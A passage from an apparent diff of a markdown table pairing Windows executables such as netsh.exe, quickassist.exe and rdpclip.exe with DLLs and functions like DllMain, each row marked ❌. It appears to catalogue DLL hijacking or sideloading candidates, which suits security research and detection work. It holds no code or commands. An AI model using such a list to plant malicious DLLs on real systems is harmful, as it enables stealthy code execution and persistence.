CreateTransaction | +| ❌ | netsh.exe | ktmw32.dll | DllMain | +| ❌ | netsh.exe | mintdh.dll | DllMain | +| ❌ | netsh.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | netsh.exe | MobileNetworking.dll | DllMain | +| ❌ | netsh.exe | NDFAPI.DLL | DllMain | +| ❌ | netsh.exe | NETIOHLP.DLL | DllMain | +| ❌ | netsh.exe | NETIOHLP.DLL | InitHelperDll | +| ❌ | netsh.exe | netshell.dll | DllMain | +| ❌ | netsh.exe | NETTRACE.DLL | DllMain | +| ❌ | netsh.exe | NETTRACE.DLL | InitHelperDll | +| ❌ | netsh.exe | nlaapi.dll | DllMain | +| ❌ | netsh.exe | NSHHTTP.DLL | DllMain | +| ❌ | netsh.exe | NSHHTTP.DLL | InitHelperDll | +| ❌ | netsh.exe | NSHIPSEC.DLL | DllMain | 
+| ❌ | netsh.exe | NSHIPSEC.DLL | InitHelperDll | +| ❌ | netsh.exe | NSHWFP.DLL | DllMain | +| ❌ | netsh.exe | NSHWFP.DLL | InitHelperDll | +| ❌ | netsh.exe | OneX.DLL | DllMain | +| ❌ | netsh.exe | P2P.dll | DllMain | +| ❌ | netsh.exe | P2PNETSH.DLL | DllMain | +| ❌ | netsh.exe | P2PNETSH.DLL | InitHelperDll | +| ❌ | netsh.exe | PEERDISTSH.DLL | DllMain | +| ❌ | netsh.exe | PEERDISTSH.DLL | InitHelperDll | +| ❌ | netsh.exe | POLSTORE.DLL | DllMain | +| ❌ | netsh.exe | POLSTORE.DLL | IPSecOpenPolicyStore | +| ❌ | netsh.exe | RASAPI32.dll | DllMain | +| ❌ | netsh.exe | rasman.dll | DllMain | +| ❌ | netsh.exe | RASMONTR.DLL | DllMain | +| ❌ | netsh.exe | RASMONTR.DLL | InitHelperDll | +| ❌ | netsh.exe | RMCLIENT.dll | DllMain | +| ❌ | netsh.exe | RPCNSH.DLL | DllMain | +| ❌ | netsh.exe | RPCNSH.DLL | InitHelperDll | +| ❌ | netsh.exe | SLC.dll | DllMain | +| ❌ | netsh.exe | SLC.dll | SLRegisterWindowsEvent | +| ❌ | netsh.exe | sppc.dll | DllMain | +| ❌ | netsh.exe | sppc.dll | SLRegisterEvent | +| ❌ | netsh.exe | SspiCli.dll | DllMain | +| ❌ | netsh.exe | USERENV.dll | DllMain | +| ❌ | netsh.exe | USERENV.dll | RegisterGPNotification | +| ❌ | netsh.exe | wcmapi.dll | DllMain | +| ❌ | netsh.exe | WCNNETSH.DLL | DllMain | +| ❌ | netsh.exe | WCNNETSH.DLL | InitHelperDll | +| ❌ | netsh.exe | wdi.dll | DllMain | +| ❌ | netsh.exe | wevtapi.dll | DllMain | +| ❌ | netsh.exe | WHHELPER.DLL | DllMain | +| ❌ | netsh.exe | WHHELPER.DLL | InitHelperDll | +| ❌ | netsh.exe | WINHTTP.dll | DllMain | +| ❌ | netsh.exe | WINIPSEC.DLL | DllMain | +| ❌ | netsh.exe | WINNSI.DLL | DllMain | +| ❌ | netsh.exe | wlanapi.dll | DllMain | +| ❌ | netsh.exe | WLANCFG.DLL | DllMain | +| ❌ | netsh.exe | WLANCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | WSHELPER.DLL | DllMain | +| ❌ | netsh.exe | WSHELPER.DLL | InitHelperDll | +| ❌ | netsh.exe | WWANCFG.DLL | DllMain | +| ❌ | netsh.exe | WWANCFG.DLL | InitHelperDll | +| ❌ | netsh.exe | wwapi.dll | DllMain | +| ❌ | netstat.exe | IPHLPAPI.DLL | DllMain | 
+| ❌ | netstat.exe | IPHLPAPI.DLL | InternalGetIfTable | +| ❌ | netstat.exe | IPHLPAPI.DLL | InternalGetTcpTable2 | +| ❌ | netstat.exe | snmpapi.dll | DllMain | +| ❌ | netstat.exe | snmpapi.dll | SnmpTfxOpen | +| ❌ | ngciso.exe | iumbase.DLL | DllMain | +| ❌ | nltest.exe | logoncli.dll | DllMain | +| ❌ | nltest.exe | netutils.dll | DllMain | +| ❌ | nltest.exe | NTDSAPI.dll | DllMain | +| ❌ | nslookup.exe | DNSAPI.dll | DllMain | +| ❌ | nslookup.exe | DNSAPI.dll | DnsQueryConfigAllocEx | +| ❌ | omadmclient.exe | DEVOBJ.dll | DllMain | +| ❌ | omadmclient.exe | DMCfgUtils.dll | DllMain | +| ❌ | omadmclient.exe | DMCmnUtils.dll | DllMain | +| ❌ | omadmclient.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | omadmclient.exe | dmenterprisediagnostics.dll | DllMain | +| ❌ | omadmclient.exe | dmiso8601utils.dll | DllMain | +| ❌ | omadmclient.exe | DMOleAutUtils.dll | DllMain | +| ❌ | omadmclient.exe | dmxmlhelputils.dll | DllMain | +| ❌ | omadmclient.exe | IPHLPAPI.DLL | DllMain | +| ❌ | omadmclient.exe | iri.dll | DllMain | +| ❌ | omadmclient.exe | omadmapi.dll | DllMain | +| ❌ | omadmclient.exe | omadmapi.dll | FreeCommandLineOptions | +| ❌ | omadmclient.exe | omadmapi.dll | OmaDmGetInternalAcctID | +| ❌ | omadmclient.exe | omadmapi.dll | ProcessCommandLine | +| ❌ | omadmclient.exe | policymanager.dll | DllMain | +| ❌ | omadmclient.exe | USERENV.dll | DllMain | +| ❌ | omadmclient.exe | XmlLite.dll | DllMain | +| ❌ | openfiles.exe | netutils.dll | DllMain | +| ❌ | openfiles.exe | srvcli.dll | DllMain | +| ❌ | openfiles.exe | SspiCli.dll | DllMain | +| ❌ | osk.exe | AUDIOSES.DLL | DllMain | +| ❌ | osk.exe | AVRT.dll | DllMain | +| ❌ | osk.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | osk.exe | DEVOBJ.dll | DllMain | +| ❌ | osk.exe | dwmapi.dll | DllMain | +| ❌ | osk.exe | dwmapi.dll | DwmIsCompositionEnabled | +| ❌ | osk.exe | dwmapi.dll | DwmSetWindowAttribute | +| ❌ | osk.exe | ksuser.dll | DllMain | +| ❌ | osk.exe | midimap.dll | DllMain | +| ❌ | osk.exe | 
midimap.dll | DriverProc | +| ❌ | osk.exe | MMDevAPI.DLL | DllMain | +| ❌ | osk.exe | MSACM32.dll | acmGetVersion | +| ❌ | osk.exe | MSACM32.dll | DllMain | +| ❌ | osk.exe | OLEACC.dll | AccessibleObjectFromWindowTimeout | +| ❌ | osk.exe | OLEACC.dll | AccSetRunningUtilityState | +| ❌ | osk.exe | OLEACC.dll | DllMain | +| ❌ | osk.exe | OLEACC.dll | GetProcessHandleFromHwnd | +| ❌ | osk.exe | OskSupport.dll | DllMain | +| ❌ | osk.exe | OskSupport.dll | InitializeOSKSupport | +| ❌ | osk.exe | OskSupport.dll | UninitializeOSKSupport | +| ❌ | osk.exe | WindowsCodecs.dll | DllMain | +| ❌ | osk.exe | WindowsCodecs.dll | WICCreateImagingFactory\_Proxy | +| ❌ | osk.exe | WMsgAPI.dll | DllMain | +| ❌ | pacjsworker.exe | WINHTTP.dll | DllMain | +| ❌ | packageinspector.exe | msi.dll | DllMain | +| ❌ | packageinspector.exe | SLC.dll | DllMain | +| ❌ | packageinspector.exe | SLC.dll | SLGetWindowsInformationDWORD | +| ❌ | packageinspector.exe | sppc.dll | DllMain | +| ❌ | packageinspector.exe | wevtapi.dll | DllMain | +| ❌ | pathping.exe | IPHLPAPI.DLL | DllMain | +| ❌ | pcalua.exe | pcaui.dll | DllMain | +| ❌ | pcalua.exe | wer.dll | DllMain | +| ❌ | pinenrollmentbroker.exe | PROPSYS.dll | DllMain | +| ❌ | pinenrollmentbroker.exe | SspiCli.dll | DllMain | +| ❌ | pktmon.exe | mintdh.dll | DllMain | +| ❌ | pktmon.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | plasrv.exe | Cabinet.dll | DllMain | +| ❌ | plasrv.exe | mintdh.dll | DllMain | +| ❌ | plasrv.exe | mintdh.dll | TdhpSetWbemExtensionBlock | +| ❌ | plasrv.exe | pdh.dll | DllMain | +| ❌ | plasrv.exe | tdh.dll | DllMain | +| ❌ | plasrv.exe | wevtapi.dll | DllMain | +| ❌ | pnpunattend.exe | dbgcore.DLL | DllMain | +| ❌ | pnpunattend.exe | DEVRTL.dll | DllMain | +| ❌ | pnpunattend.exe | newdev.dll | DllMain | +| ❌ | pnpunattend.exe | wdscore.dll | ConstructPartialMsgVW | +| ❌ | pnpunattend.exe | wdscore.dll | CurrentIP | +| ❌ | pnpunattend.exe | wdscore.dll | DllMain | +| ❌ | pnpunattend.exe | wdscore.dll | 
WdsSetupLogDestroy | +| ❌ | pnpunattend.exe | wdscore.dll | WdsSetupLogInit | +| ❌ | pnpunattend.exe | wdscore.dll | WdsSetupLogMessageW | +| ❌ | presentationhost.exe | CRYPTBASE.DLL | DllMain | +| ❌ | presentationhost.exe | mscoree.dll | CorExitProcess | +| ❌ | presentationhost.exe | mscoree.dll | DllMain | +| ❌ | presentationhost.exe | WININET.dll | DllMain | +| ❌ | presentationsettings.exe | SspiCli.dll | DllMain | +| ❌ | presentationsettings.exe | SspiCli.dll | GetUserNameExW | +| ❌ | printbrmui.exe | IPHLPAPI.DLL | DllMain | +| ❌ | printbrmui.exe | PROPSYS.dll | DllMain | +| ❌ | psr.exe | AEPIC.dll | DllMain | +| ❌ | psr.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | psr.exe | CLDAPI.dll | DllMain | +| ❌ | psr.exe | FLTLIB.DLL | DllMain | +| ❌ | psr.exe | HID.DLL | DllMain | +| ❌ | psr.exe | msdrm.dll | DllMain | +| ❌ | psr.exe | OLEACC.dll | DllMain | +| ❌ | psr.exe | SspiCli.dll | DllMain | +| ❌ | psr.exe | SspiCli.dll | GetUserNameExW | +| ❌ | psr.exe | uireng.dll | DllMain | +| ❌ | psr.exe | uireng.dll | UirInitializeEngine | +| ❌ | psr.exe | XmlLite.dll | DllMain | +| ❌ | query.exe | logoncli.dll | DllMain | +| ❌ | query.exe | netutils.dll | DllMain | +| ❌ | query.exe | REGAPI.dll | DllMain | +| ❌ | query.exe | REGAPI.dll | RegQueryUtilityCommandList | +| ❌ | query.exe | samcli.dll | DllMain | +| ❌ | query.exe | srvcli.dll | DllMain | +| ❌ | query.exe | utildll.dll | DllMain | +| ❌ | query.exe | WINSTA.dll | DllMain | +| ❌ | quickassist.exe | ATL.DLL | AtlComPtrAssign | +| ❌ | quickassist.exe | ATL.DLL | DllMain | +| ❌ | quickassist.exe | CRYPTBASE.DLL | DllMain | +| ❌ | quickassist.exe | CRYPTBASE.DLL | SystemFunction036 | +| ❌ | quickassist.exe | d2d1.dll | DllMain | +| ❌ | quickassist.exe | d3d11.dll | DllMain | +| ❌ | quickassist.exe | dcomp.dll | DllMain | +| ❌ | quickassist.exe | dxgi.dll | DllMain | +| ❌ | quickassist.exe | PROPSYS.dll | DllMain | +| ❌ | quickassist.exe | PROPSYS.dll | VariantToStringWithDefault | +| ❌ | 
quickassist.exe | SAS.dll | DllMain | +| ❌ | quickassist.exe | SspiCli.dll | AcquireCredentialsHandleA | +| ❌ | quickassist.exe | SspiCli.dll | DllMain | +| ❌ | quickassist.exe | SspiCli.dll | GetUserNameExA | +| ❌ | quickassist.exe | SspiCli.dll | GetUserNameExW | +| ❌ | quickassist.exe | SspiCli.dll | InitializeSecurityContextA | +| ❌ | quickassist.exe | SspiCli.dll | QueryContextAttributesExA | +| ❌ | quickassist.exe | UxTheme.dll | DllMain | +| ❌ | quickassist.exe | UxTheme.dll | SetWindowThemeAttribute | +| ❌ | quickassist.exe | WindowsCodecs.dll | DllMain | +| ❌ | quickassist.exe | WININET.dll | AppCacheGetGroupList | +| ❌ | quickassist.exe | WININET.dll | DllMain | +| ❌ | quickassist.exe | WININET.dll | InternetInitializeAutoProxyDll | +| ❌ | quickassist.exe | WININET.dll | InternetOpenW | +| ❌ | quickassist.exe | WININET.dll | InternetSetOptionW | +| ❌ | quser.exe | logoncli.dll | DllMain | +| ❌ | quser.exe | netutils.dll | DllMain | +| ❌ | quser.exe | samcli.dll | DllMain | +| ❌ | quser.exe | srvcli.dll | DllMain | +| ❌ | quser.exe | UTILDLL.dll | DllMain | +| ❌ | quser.exe | UTILDLL.dll | StrConnectState | +| ❌ | quser.exe | WINSTA.dll | DllMain | +| ❌ | quser.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | qwinsta.exe | logoncli.dll | DllMain | +| ❌ | qwinsta.exe | netutils.dll | DllMain | +| ❌ | qwinsta.exe | samcli.dll | DllMain | +| ❌ | qwinsta.exe | srvcli.dll | DllMain | +| ❌ | qwinsta.exe | UTILDLL.dll | DllMain | +| ❌ | qwinsta.exe | UTILDLL.dll | StrConnectState | +| ❌ | qwinsta.exe | WINSTA.dll | DllMain | +| ❌ | qwinsta.exe | WINSTA.dll | WinStationEnumerateW | +| ❌ | rasautou.exe | MPRAPI.dll | DllMain | +| ❌ | rasautou.exe | rasman.dll | DllMain | +| ❌ | rasautou.exe | rtutils.dll | DllMain | +| ❌ | rasdial.exe | RASAPI32.dll | DllMain | +| ❌ | rasdial.exe | RASAPI32.dll | RasCompleteDialMachineCleanup | +| ❌ | rasdial.exe | RASAPI32.dll | RasEnumConnectionsW | +| ❌ | rasdial.exe | rasman.dll | DllMain | +| ❌ | rasdial.exe | rasman.dll | 
RasConnectionEnum | +| ❌ | rasdial.exe | rasman.dll | RasInitialize | +| ❌ | rasdial.exe | rtutils.dll | DllMain | +| ❌ | rasdial.exe | rtutils.dll | TracePrintfExA | +| ❌ | rasdial.exe | rtutils.dll | TraceRegisterExA | +| ❌ | raserver.exe | netutils.dll | DllMain | +| ❌ | raserver.exe | samcli.dll | DllMain | +| ❌ | raserver.exe | WTSAPI32.dll | DllMain | +| ❌ | rdpclip.exe | CRYPTBASE.DLL | DllMain | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInfo | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjEnumDeviceInterfaces | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInfoListDetail | +| ❌ | rdpclip.exe | DEVOBJ.dll | DevObjGetDeviceInterfaceDetail | +| ❌ | rdpclip.exe | DEVOBJ.dll | DllMain | +| ❌ | rdpclip.exe | dwmapi.dll | DllMain | +| ❌ | rdpclip.exe | IPHLPAPI.DLL | DllMain | +| ❌ | rdpclip.exe | PROPSYS.dll | DllMain | +| ❌ | rdpclip.exe | srpapi.dll | DllMain | +| ❌ | rdpclip.exe | WINSTA.dll | DllMain | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationNameFromLogonIdW | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationQueryInformationW | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationRegisterConsoleNotification | +| ❌ | rdpclip.exe | WINSTA.dll | WinStationVirtualOpenEx | +| ❌ | rdpclip.exe | WTSAPI32.dll | DllMain | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSQuerySessionInformationW | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSRegisterSessionNotification | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpen | +| ❌ | rdpclip.exe | WTSAPI32.dll | WTSVirtualChannelOpenEx | +| ❌ | rdpsa.exe | SspiCli.dll | DllMain | +| ❌ | rdpsa.exe | WINSTA.dll | DllMain | +| ❌ | rdpsauachelper.exe | WINSTA.dll | DllMain | +| ❌ | rdpsauachelper.exe | WINSTA.dll | WinStationGetAllProcesses | +| ❌ | rdpshell.exe | dwmapi.dll | DllMain | +| ❌ | rdpshell.exe | WINSTA.dll | DllMain | +| ❌ | rdpshell.exe | 
WINSTA.dll | WinStationGetConnectionProperty | +| ❌ | rdpshell.exe | WTSAPI32.dll | DllMain | +| ❌ | rdvghelper.exe | dwmapi.dll | DllMain | +| ❌ | rdvghelper.exe | WINSTA.dll | DllMain | +| ❌ | rdvghelper.exe | WINSTA.dll | WinStationRegisterConsoleNotification | +| ❌ | rdvghelper.exe | WTSAPI32.dll | DllMain | +| ❌ | rdvghelper.exe | WTSAPI32.dll | WTSRegisterSessionNotification | +| ❌ | reagentc.exe | Cabinet.dll | DllMain | +| ❌ | reagentc.exe | ReAgent.dll | DllMain | +| ❌ | reagentc.exe | ReAgent.dll | WinReGetError | +| ❌ | reagentc.exe | ReAgent.dll | WinReSetError | +| ❌ | recover.exe | DEVOBJ.dll | DllMain | +| ❌ | register-cimprovider.exe | miutils.dll | DllMain | +| ❌ | register-cimprovider.exe | prvdmofcomp.dll | CreateRegisterParameter | +| ❌ | register-cimprovider.exe | prvdmofcomp.dll | DllMain | +| ❌ | rekeywiz.exe | credui.dll | DllMain | +| ❌ | rekeywiz.exe | CRYPTBASE.DLL | DllMain | +| ❌ | rekeywiz.exe | CRYPTUI.dll | DllMain | +| ❌ | rekeywiz.exe | DSROLE.dll | DllMain | +| ❌ | rekeywiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation | +| ❌ | rekeywiz.exe | duser.dll | DllMain | +| ❌ | rekeywiz.exe | EFSADU.dll | DllMain | +| ❌ | rekeywiz.exe | EFSUTIL.dll | DllMain | +| ❌ | rekeywiz.exe | EFSUTIL.dll | EfsUtilApplyGroupPolicy | +| ❌ | rekeywiz.exe | FeClient.dll | DllMain | +| ❌ | rekeywiz.exe | logoncli.dll | DllMain | +| ❌ | rekeywiz.exe | netutils.dll | DllMain | +| ❌ | rekeywiz.exe | USERENV.dll | DllMain | +| ❌ | rekeywiz.exe | VAULTCLI.dll | DllMain | +| ❌ | relog.exe | pdh.dll | DllMain | +| ❌ | relpost.exe | Cabinet.dll | DllMain | +| ❌ | relpost.exe | ReAgent.dll | DllMain | +| ❌ | relpost.exe | wer.dll | DllMain | +| ❌ | repair-bde.exe | BDEREPAIR.dll | DllMain | +| ❌ | reset.exe | logoncli.dll | DllMain | +| ❌ | reset.exe | netutils.dll | DllMain | +| ❌ | reset.exe | REGAPI.dll | DllMain | +| ❌ | reset.exe | REGAPI.dll | RegQueryUtilityCommandList | +| ❌ | reset.exe | samcli.dll | DllMain | +| ❌ | reset.exe | srvcli.dll | 
DllMain | +| ❌ | reset.exe | utildll.dll | DllMain | +| ❌ | reset.exe | WINSTA.dll | DllMain | +| ❌ | resetengine.exe | bcd.dll | DllMain | +| ❌ | resetengine.exe | Cabinet.dll | DllMain | +| ❌ | resetengine.exe | DismApi.DLL | DllMain | +| ❌ | resetengine.exe | FVEAPI.dll | DllMain | +| ❌ | resetengine.exe | ReAgent.dll | DllMain | +| ❌ | resetengine.exe | ResetEngine.dll | DllMain | +| ❌ | resetengine.exe | tbs.dll | DllMain | +| ❌ | resetengine.exe | VSSAPI.DLL | DllMain | +| ❌ | resetengine.exe | VssTrace.DLL | DllMain | +| ❌ | resetengine.exe | WDSCORE.dll | DllMain | +| ❌ | resetengine.exe | WIMGAPI.DLL | DllMain | +| ❌ | resetengine.exe | WINHTTP.dll | DllMain | +| ❌ | resetengine.exe | WOFUTIL.dll | DllMain | +| ❌ | resetengine.exe | XmlLite.dll | DllMain | +| ❌ | resmon.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | resmon.exe | CLDAPI.dll | DllMain | +| ❌ | resmon.exe | CRYPTBASE.DLL | DllMain | +| ❌ | resmon.exe | edputil.dll | DllMain | +| ❌ | resmon.exe | edputil.dll | EdpGetIsManaged | +| ❌ | resmon.exe | FLTLIB.DLL | DllMain | +| ❌ | resmon.exe | PROPSYS.dll | DllMain | +| ❌ | resmon.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | resmon.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | rmactivate\_isv.exe | msdrm.dll | \_\_AddMachineCertToLicenseStore | +| ❌ | rmactivate\_isv.exe | msdrm.dll | DllMain | +| ❌ | rmactivate\_ssp\_isv.exe | CRYPTBASE.dll | DllMain | +| ❌ | rmactivate\_ssp\_isv.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | rmactivate.exe | CRYPTBASE.dll | DllMain | +| ❌ | rmactivate.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | rmactivate.exe | msdrm.dll | \_\_AddMachineCertToLicenseStore | +| ❌ | rmactivate.exe | msdrm.dll | DllMain | +| ❌ | rmttpmvscmgrsvr.exe | DEVOBJ.dll | DllMain | +| ❌ | route.exe | IPHLPAPI.DLL | DllMain | +| ❌ | rpcping.exe | credui.dll | DllMain | +| ❌ | rpcping.exe | SspiCli.dll | DllMain | +| ❌ | rpcping.exe | WINHTTP.dll | DllMain | +| ❌ | rwinsta.exe | logoncli.dll | 
DllMain | +| ❌ | rwinsta.exe | netutils.dll | DllMain | +| ❌ | rwinsta.exe | samcli.dll | DllMain | +| ❌ | rwinsta.exe | srvcli.dll | DllMain | +| ❌ | rwinsta.exe | utildll.dll | DllMain | +| ❌ | rwinsta.exe | WINSTA.dll | DllMain | +| ❌ | searchfilterhost.exe | TQUERY.DLL | DllMain | +| ❌ | secedit.exe | SCECLI.dll | DllMain | +| ❌ | securityhealthservice.exe | DNSAPI.dll | DllMain | +| ❌ | securityhealthservice.exe | FirewallAPI.dll | DllMain | +| ❌ | securityhealthservice.exe | fwbase.dll | DllMain | +| ❌ | securityhealthservice.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | securityhealthservice.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | securityhealthservice.exe | USERENV.dll | DllMain | +| ❌ | securityhealthservice.exe | Wldp.dll | DllMain | +| ❌ | securityhealthservice.exe | WTSAPI32.dll | DllMain | +| ❌ | settingsynchost.exe | policymanager.dll | DllMain | +| ❌ | settingsynchost.exe | PROPSYS.dll | DllMain | +| ❌ | settingsynchost.exe | USERENV.dll | DllMain | +| ❌ | setupugc.exe | dbgcore.DLL | DllMain | +| ❌ | setupugc.exe | DNSAPI.dll | DllMain | +| ❌ | setupugc.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | setupugc.exe | WDSCORE.dll | CurrentIP | +| ❌ | setupugc.exe | WDSCORE.dll | DllMain | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogDestroy | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogInit | +| ❌ | setupugc.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | shutdown.exe | SspiCli.dll | DllMain | +| ❌ | slidetoshutdown.exe | d3d10warp.dll | DllMain | +| ❌ | slidetoshutdown.exe | d3d10warp.dll | OpenAdapter10\_2 | +| ❌ | slui.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | slui.exe | CLDAPI.dll | DllMain | +| ❌ | slui.exe | CRYPTBASE.DLL | DllMain | +| ❌ | slui.exe | edputil.dll | DllMain | +| ❌ | slui.exe | edputil.dll | EdpGetIsManaged | +| ❌ | slui.exe | FLTLIB.DLL | DllMain | +| ❌ | slui.exe | PROPSYS.dll | DllMain | +| ❌ | slui.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | slui.exe | PROPSYS.dll 
| PSPropertyBag\_WriteDWORD | +| ❌ | slui.exe | sppc.dll | DllMain | +| ❌ | slui.exe | WINBRAND.dll | DllMain | +| ❌ | slui.exe | WTSAPI32.dll | DllMain | +| ❌ | spaceagent.exe | NETUTILS.DLL | DllMain | +| ❌ | spaceagent.exe | SRVCLI.DLL | DllMain | +| ❌ | spectrum.exe | SpectrumSyncClient.dll | DllMain | +| ❌ | spoolsv.exe | DNSAPI.dll | DllMain | +| ❌ | sppextcomobj.exe | adsldpc.dll | DllMain | +| ❌ | sppextcomobj.exe | CRYPTBASE.dll | DllMain | +| ❌ | sppextcomobj.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | sppextcomobj.exe | DNSAPI.dll | DllMain | +| ❌ | sppsvc.exe | CRYPTXML.dll | DllMain | +| ❌ | sppsvc.exe | webservices.dll | DllMain | +| ❌ | sppsvc.exe | XmlLite.dll | DllMain | +| ❌ | srtasks.exe | bcd.dll | DllMain | +| ❌ | srtasks.exe | ktmw32.dll | DllMain | +| ❌ | srtasks.exe | SPP.dll | DllMain | +| ❌ | srtasks.exe | SRCLIENT.dll | DllMain | +| ❌ | srtasks.exe | SRCORE.dll | DllMain | +| ❌ | srtasks.exe | VSSAPI.DLL | DllMain | +| ❌ | srtasks.exe | VssTrace.DLL | DllMain | +| ❌ | srtasks.exe | wer.dll | DllMain | +| ❌ | stordiag.exe | CRYPTBASE.dll | DllMain | +| ❌ | stordiag.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | synchost.exe | PROPSYS.dll | DllMain | +| ❌ | sysreseterr.exe | WDSCORE.dll | DllMain | +| ❌ | systeminfo.exe | SspiCli.dll | DllMain | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjEnumDeviceInfo | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjEnumDeviceInterfaces | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetDeviceInfoListDetail | +| ❌ | tabcal.exe | DEVOBJ.dll | DevObjGetDeviceInterfaceDetail | +| ❌ | tabcal.exe | DEVOBJ.dll | DllMain | +| ❌ | tabcal.exe | HID.DLL | DllMain | +| ❌ | tabcal.exe | HID.DLL | HidD\_GetHidGuid | +| ❌ | tabcal.exe | NInput.dll | DllMain | +| ❌ | takeown.exe | SspiCli.dll | DllMain | +| ❌ | tapiunattend.exe | WDSCORE.dll | 
ConstructPartialMsgVW | +| ❌ | tapiunattend.exe | WDSCORE.dll | CurrentIP | +| ❌ | tapiunattend.exe | WDSCORE.dll | DllMain | +| ❌ | tapiunattend.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | tar.exe | archiveint.dll | archive\_match\_new | +| ❌ | tar.exe | archiveint.dll | DllMain | +| ❌ | taskkill.exe | dbghelp.dll | DllMain | +| ❌ | taskkill.exe | netutils.dll | DllMain | +| ❌ | taskkill.exe | srvcli.dll | DllMain | +| ❌ | taskkill.exe | SspiCli.dll | DllMain | +| ❌ | tasklist.exe | dbghelp.dll | DllMain | +| ❌ | tasklist.exe | netutils.dll | DllMain | +| ❌ | tasklist.exe | srvcli.dll | DllMain | +| ❌ | tasklist.exe | SspiCli.dll | DllMain | +| ❌ | tieringengineservice.exe | CLUSAPI.dll | DllMain | +| ❌ | tieringengineservice.exe | DNSAPI.dll | DllMain | +| ❌ | tieringengineservice.exe | ESENT.dll | DllMain | +| ❌ | tracert.exe | IPHLPAPI.DLL | DllMain | +| ❌ | tscon.exe | logoncli.dll | DllMain | +| ❌ | tscon.exe | netutils.dll | DllMain | +| ❌ | tscon.exe | samcli.dll | DllMain | +| ❌ | tscon.exe | srvcli.dll | DllMain | +| ❌ | tscon.exe | utildll.dll | DllMain | +| ❌ | tscon.exe | WINSTA.dll | DllMain | +| ❌ | tsdiscon.exe | WINSTA.dll | DllMain | +| ❌ | tsdiscon.exe | WINSTA.dll | WinStationNameFromLogonIdW | +| ❌ | tskill.exe | logoncli.dll | DllMain | +| ❌ | tskill.exe | netutils.dll | DllMain | +| ❌ | tskill.exe | samcli.dll | DllMain | +| ❌ | tskill.exe | srvcli.dll | DllMain | +| ❌ | tskill.exe | utildll.dll | DllMain | +| ❌ | tskill.exe | WINSTA.dll | DllMain | +| ❌ | tttracer.exe | TTDRecord.dll | DllMain | +| ❌ | tttracer.exe | USERENV.dll | DllMain | +| ❌ | typeperf.exe | pdh.dll | DllMain | +| ❌ | tzsync.exe | CRYPTBASE.dll | DllMain | +| ❌ | tzsync.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | uevappmonitor.exe | CRYPTBASE.dll | DllMain | +| ❌ | uevappmonitor.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | unlodctr.exe | loadperf.dll | DllMain | +| ❌ | upfc.exe | XmlLite.dll | DllMain | +| ❌ | upgraderesultsui.exe | DMCmnUtils.dll | DllMain 
| +| ❌ | useraccountcontrolsettings.exe | CRYPTBASE.dll | DllMain | +| ❌ | useraccountcontrolsettings.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | usocoreworker.exe | Cabinet.dll | DllMain | +| ❌ | usocoreworker.exe | DMCmnUtils.dll | DllMain | +| ❌ | usocoreworker.exe | dmiso8601utils.dll | DllMain | +| ❌ | usocoreworker.exe | DMOleAutUtils.dll | DllMain | +| ❌ | usocoreworker.exe | iri.dll | DllMain | +| ❌ | usocoreworker.exe | omadmapi.dll | DllMain | +| ❌ | usocoreworker.exe | UpdatePolicy.dll | DllMain | +| ❌ | usocoreworker.exe | XmlLite.dll | DllMain | +| ❌ | utcdecoderhost.exe | USERENV.dll | DllMain | +| ❌ | utilman.exe | OLEACC.dll | DllMain | +| ❌ | vaultcmd.exe | VAULTCLI.dll | DllMain | +| ❌ | vds.exe | ATL.DLL | AtlModuleInit | +| ❌ | vds.exe | ATL.DLL | AtlModuleTerm | +| ❌ | vds.exe | ATL.DLL | DllMain | +| ❌ | vds.exe | bcd.dll | DllMain | +| ❌ | vds.exe | OSUNINST.dll | DllMain | +| ❌ | vdsldr.exe | ATL.DLL | AtlModuleInit | +| ❌ | vdsldr.exe | ATL.DLL | AtlModuleRegisterClassObjects | +| ❌ | vdsldr.exe | ATL.DLL | DllMain | +| ❌ | 